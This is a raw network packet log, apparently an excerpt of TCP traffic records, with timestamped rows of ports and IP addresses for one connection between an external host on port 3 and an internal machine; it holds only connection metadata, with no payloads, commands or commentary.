Oct 9, 2024 16:30:18.696537971 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.696598053 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.696857929 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.696902037 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.697150946 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.697355986 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.697649956 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.697849989 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.697891951 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.698065996 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.698096037 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.698287010 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.698457003 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.698503017 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.698513985 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.698522091 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.698529959 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.698538065 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.698776960 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.698970079 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.698995113 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.699065924 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.699227095 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.699410915 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.935127974 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.935199022 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.935208082 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.935480118 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.935488939 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.935513973 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.935539961 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.935709953 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.935873032 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.935934067 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.936513901 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.936530113 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.936543941 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.936553001 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.936561108 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.936569929 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.936578035 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.936696053 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.936718941 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.936747074 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.936846972 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.936897039 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.936918020 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.936994076 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.937001944 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.937057972 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.937419891 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.937504053 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.937513113 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.937520981 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.937529087 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.937588930 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.937935114 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.938075066 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.938266039 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.938275099 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.938282967 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.938452005 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.938546896 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.938586950 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.938714027 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.938754082 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.938971996 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.939141035 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.939183950 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.939193010 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.939312935 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.939483881 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.939527035 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.939685106 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:18.939822912 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:18.939992905 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.184446096 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.184518099 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.184823990 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.184844971 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.185014963 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.185024977 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.185033083 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.185041904 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.185307980 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.185317039 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.185324907 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.185355902 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.185408115 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.185453892 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.185525894 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.185527086 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.185627937 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.185676098 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.185703039 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.185847044 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.186017990 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.186032057 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.186041117 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.186188936 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.186357975 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.186526060 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.186697006 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.186868906 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.187036991 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.187206030 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.187408924 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.187553883 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.423420906 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.423433065 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.423583031 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.423788071 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.423809052 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.423820972 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.423870087 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.424057007 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.424227953 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.424266100 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.424387932 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.424546003 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.424603939 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.424721956 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.424767971 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.424956083 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.425124884 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.425331116 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.425339937 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.425348043 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.425375938 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.425447941 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.425493002 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.425616026 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.425625086 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.425651073 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.425821066 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.425832987 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.425975084 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.426002979 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.426170111 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.426191092 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.426316977 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.426485062 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.426862001 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.426871061 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.426963091 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.426971912 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.427246094 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.427563906 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.427572966 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.427581072 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.427608967 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.427870989 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.427880049 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.427887917 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.427917957 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.427918911 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.427963018 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.428141117 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.428282976 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.428292036 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.428323984 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.428352118 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.428524017 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.428539991 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.428550005 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.428647041 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.428694963 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.428862095 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.428865910 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.428869963 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.429066896 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.429115057 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.429235935 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.429238081 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.429245949 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.429383039 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.429419994 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.429713964 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.430111885 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.430120945 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.430130005 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.430151939 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.430223942 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.430232048 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.430239916 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.430279016 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.430288076 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.430345058 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.430391073 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.430439949 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.430552006 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.430561066 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.430602074 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.430874109 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.431000948 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.431000948 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.431000948 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.431025028 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.431046963 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.431130886 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.431585073 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.431593895 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.431602001 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.431610107 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.431617975 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.431823015 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.431884050 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.431895971 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.431936026 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.432005882 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.432147980 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.432156086 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.432157040 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.432163954 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.432333946 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.432333946 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.432333946 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.432333946 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.432495117 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.432662964 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.432662964 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.663460016 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.663539886 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.663562059 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.663685083 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.663885117 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.663893938 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.663902044 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.663918972 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.663930893 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.663935900 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.663938999 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.664202929 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.664241076 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.664242029 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.664242029 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.664242029 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.664251089 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.664258957 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.664282084 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.664968014 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.664977074 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.664985895 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.664993048 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.665000916 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.665009975 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.665018082 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.665062904 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.665103912 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.665112019 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.665357113 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.665365934 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.665380001 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.665390968 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.665399075 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.665406942 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.665415049 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.665422916 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666295052 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666302919 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666311026 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666347027 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666354895 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666363001 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666371107 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666378975 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666387081 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666393995 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666402102 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666429996 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666433096 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666433096 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666434050 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666486979 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666666031 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666673899 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666682005 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666714907 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.666898966 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.667589903 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.667598963 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.667607069 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.667614937 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.667772055 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.667782068 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.667808056 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.667855024 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.667862892 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.667907953 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.667916059 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.667923927 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.667962074 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.668148994 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.668158054 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.668201923 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.668225050 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.668232918 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.668427944 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.668437004 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.668693066 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.668700933 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.668709040 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.669009924 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.669018030 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.669025898 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.669282913 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.669466019 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.669589996 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.669599056 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.669720888 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.669843912 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.669852972 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.670021057 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.670030117 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.670346022 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.670355082 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.670362949 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.670394897 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.670403957 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.670412064 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.670631886 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.670640945 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.670676947 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.670763969 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.670773029 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.671071053 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.671080112 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.671717882 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.671726942 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.671735048 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.671777964 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.671787024 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.671794891 CEST	3	49781	89.23.100.233	192.168.11.30
